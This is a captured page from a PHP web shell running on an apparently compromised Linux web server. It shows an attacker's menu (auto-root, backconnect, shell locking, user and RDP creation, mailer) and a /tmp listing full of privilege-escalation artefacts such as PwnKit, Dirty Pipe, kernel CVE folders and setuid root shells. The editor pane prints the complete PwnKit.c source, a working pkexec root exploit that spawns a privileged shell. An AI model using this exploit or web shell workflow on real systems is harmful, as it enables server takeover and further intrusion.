Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
tmp /
[ HOME SHELL ]
Name
Size
Permission
Action
.ICE-unix
[ DIR ]
drwxrwxrwt
.X11-unix
[ DIR ]
drwxrwxrwt
.XIM-unix
[ DIR ]
drwxrwxrwt
.font-unix
[ DIR ]
drwxrwxrwt
.pkexec
[ DIR ]
drwxr-xr-x
.sessions
[ DIR ]
drwxr-xr-x
CVE-2023-0386-main
[ DIR ]
drwxr-xr-x
CVE-2024-1086
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
alfacgiapi
[ DIR ]
drwxr-xr-x
autoupdater
[ DIR ]
drwxr-xr-x
escape
[ DIR ]
drwxr-xr-x
exp
[ DIR ]
drwxr-xr-x
exp_dir
[ DIR ]
drwxrwxrwx
exploit_mnt
[ DIR ]
drwxr-xr-x
l
[ DIR ]
drwxr-xr-x
m
[ DIR ]
drwxr-xr-x
mnt
[ DIR ]
drwxr-xr-x
newroot
[ DIR ]
drwxr-xr-x
overlay
[ DIR ]
drwxr-xr-x
pwn
[ DIR ]
drwxr-xr-x
root_access
[ DIR ]
drwxr-xr-x
systemd-private-bd735db8dd9142...
[ DIR ]
drwx------
systemd-private-bd735db8dd9142...
[ DIR ]
drwx------
systemd-private-bd735db8dd9142...
[ DIR ]
drwx------
systemd-private-bd735db8dd9142...
[ DIR ]
drwx------
u
[ DIR ]
drwxr-xr-x
w
[ DIR ]
drwxr-xr-x
17374573617800.573847922551246...
0
B
-rw-r--r--
17374573617810.035961845040536...
273
B
-rw-r--r--
17374573622130.784134289160793...
264
B
-rw-r--r--
17374573622130.915140681706561...
0
B
-rw-r--r--
17374573654100.544493277368635...
0
B
-rw-r--r--
17374573654100.553821778902696...
0
B
-rw-r--r--
17374573657320.826412143303308
344
B
-rw-r--r--
17374573657320.851691587211206...
0
B
-rw-r--r--
17374573665330.153636280884791...
1.58
KB
-rw-r--r--
17374573665330.485043938119081...
0
B
-rw-r--rw-
17374573746680.150292574007053...
0
B
-rw-r--r--
17374573746680.485192794023234...
0
B
-rw-r--r--
17374573747980.467175547480191...
81
B
-rw-r--r--
17374573747980.847972334989326...
0
B
-rw-r--r--
17374573809900.196357007071246...
0
B
-rw-r--r--
17374573809900.360855894815908...
0
B
-rw-r--r--
17374573813630.52888809575322
0
B
-rw-r--r--
17374573813630.847564033161520...
0
B
-rw-r--r--
17374573818450.353778364627650...
0
B
-rw-r--r--
17374573818450.774138005576599...
0
B
-rw-r--r--
17374573824500.032763192837064...
0
B
-rw-r--r--
17374573824510.932066932708641...
0
B
-rw-r--r--
17374573825390.514705764223425...
77
B
-rw-r--r--
17374573825390.536796383362947
0
B
-rw-r--r--
17374573876020.392543009869845
0
B
-rw-r--r--
17374573876030.752509492963260...
79
B
-rw-r--r--
17374573928620.350656031218031...
0
B
-rw-r--r--
17374573928620.994858551682468...
92
B
-rw-r--r--
17739164936190.283137229964540...
77
B
-rw-r--r--
17739164936190.378528374311302...
0
B
-rw-r--r--
17739164949320.088264136584229...
0
B
-rw-r--r--
17739164949330.689391247273381...
79
B
-rw-r--r--
17739164962550.001963573688894...
0
B
-rw-r--r--
17739164962560.192925751952457...
81
B
-rw-r--r--
17739164985000.189660605693545...
77
B
-rw-r--r--
17739164985000.607917624231998...
0
B
-rw-r--r--
17739165038000.078650645576219...
79
B
-rw-r--r--
17739165038000.296512946846561...
0
B
-rw-r--r--
17739165091600.229596065846338...
0
B
-rw-r--r--
17739165091600.266657640530011...
81
B
-rw-r--r--
8c593b8060
10
B
-rw-r--r--
PwnKit
16.41
KB
-rwxr-xr-x
PwnKit.c
3.13
KB
-rw-r--r--
agent.bin.backup
6.79
MB
-rwxr-xr-x
bash_root
1.21
MB
-rwsr-xr-x
bncert-202501231019.log
7.04
KB
-rw-------
dirtypipe
15.78
KB
-rwxr-xr-x
dirtypipe.c
493
B
-rw-r--r--
exp_file_credential
36.27
KB
-rwxr-xr-x
exploit.c
988
B
-rw-r--r--
exploit.sh
574
B
-rwxr-xr-x
exploit.so
15.42
KB
-rwxr-xr-x
installbuilder_installer.log
376
B
-rw-------
installbuilder_installer_26255...
181
B
-rw-------
installbuilder_installer_26427...
544
B
-rw-------
installbuilder_installer_26556...
181
B
-rw-------
installbuilder_installer_26680...
9.14
KB
-rw-------
installbuilder_installer_26934...
181
B
-rw-------
les.sh
91.76
KB
-rwxr-xr-x
libat.c
455
B
-rw-r--r--
libat.so
15.31
KB
-rwxr-xr-x
libhax.so
15.17
KB
-rwxr-xr-x
main.zip
11.31
KB
-rw-r--r--
proof.php
23
B
-rw-r--r--
root.c
390
B
-rw-r--r--
root.so
15.27
KB
-rwxr-xr-x
rootbash
1.21
MB
-rwsr-xr-x
rootshell
15.8
KB
-rwxr-xr-x
tes.sh
1
KB
-rwxr-xr-x
test
15.77
KB
-rwxr-xr-x
test.c
412
B
-rw-r--r--
testcron
54
B
-rw-r--r--
tmpukrmz.php
996
B
-rw-r--r--
tmpuoery.php
996
B
-rw-r--r--
tmpuphtd.php
894
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : PwnKit.c
// gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC #define _XOPEN_SOURCE 700 #define _GNU_SOURCE #include <dirent.h> #include <errno.h> #include <fcntl.h> #include <stdio.h> #include <string.h> #include <unistd.h> #include <stdlib.h> #include <ftw.h> #include <sys/wait.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/signal.h> // 64-bit library #ifdef __amd64__ const char service_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2"; #endif // 32-bit library #ifdef __i386__ const char service_interp[] __attribute__((section(".interp"))) = "/lib/ld-linux.so.2"; #endif int unlink_cb(const char *fpath, const struct stat *sb, int typeflag, struct FTW *ftwbuf) { int rv = remove(fpath); if (rv) perror(fpath); return rv; } int rmrf(char *path) { return nftw(path, unlink_cb, 64, FTW_DEPTH | FTW_PHYS); } void entry() { int res; FILE *fp; char buf[PATH_MAX]; int pipefd[2]; char *cmd; int argc; char **argv; register unsigned long *rbp asm ("rbp"); argc = *(int *)(rbp+1); argv = (char **)rbp+2; res = mkdir("GCONV_PATH=.", 0777); if (res == -1 && errno != EEXIST) { perror("Failed to create directory"); _exit(1); } res = creat("GCONV_PATH=./.pkexec", 0777); res = mkdir(".pkexec", 0777); fp = fopen(".pkexec/gconv-modules", "w+"); if (fp == NULL) { perror("Failed to open output file"); _exit(1); } if (fputs("module UTF-8// PKEXEC// pkexec 2", fp) < 0) { perror("Failed to write config"); _exit(1); } fclose(fp); buf[readlink("/proc/self/exe", buf, sizeof(buf))] = 0; res = symlink(buf, ".pkexec/pkexec.so"); if (res == -1) { perror("Failed to copy file"); _exit(1); } pipe(pipefd); if (fork() == 0) { close(pipefd[1]); buf[read(pipefd[0], buf, sizeof(buf)-1)] = 0; if (strstr(buf, "pkexec --version") == buf) { // Cleanup for situations where the exploit didn't work puts("Exploit failed. Target is most likely patched."); rmrf("GCONV_PATH=."); rmrf(".pkexec"); } _exit(0); } close(pipefd[0]); dup2(pipefd[1], 2); close(pipefd[1]); cmd = NULL; if (argc > 1) { cmd = memcpy(argv[1]-4, "CMD=", 4); } char *args[] = {NULL}; char *env[] = {".pkexec", "PATH=GCONV_PATH=.", "CHARSET=pkexec", "SHELL=pkexec", cmd, NULL}; execve("/usr/bin/pkexec", args, env); // In case pkexec is not in /usr/bin/ execvpe("pkexec", args, env); _exit(0); } void gconv() {} void gconv_init() { close(2); dup2(1, 2); char *cmd = getenv("CMD"); setresuid(0, 0, 0); setresgid(0, 0, 0); rmrf("GCONV_PATH=."); rmrf(".pkexec"); if (cmd) { execve("/bin/sh", (char *[]){"/bin/sh", "-c", cmd, NULL}, NULL); } else { // Try interactive bash first execve("/bin/bash", (char *[]){"-i", NULL}, NULL); // In case interactive bash was not possible execve("/bin/sh", (char *[]){"/bin/sh", NULL}, NULL); } _exit(0); }
Close
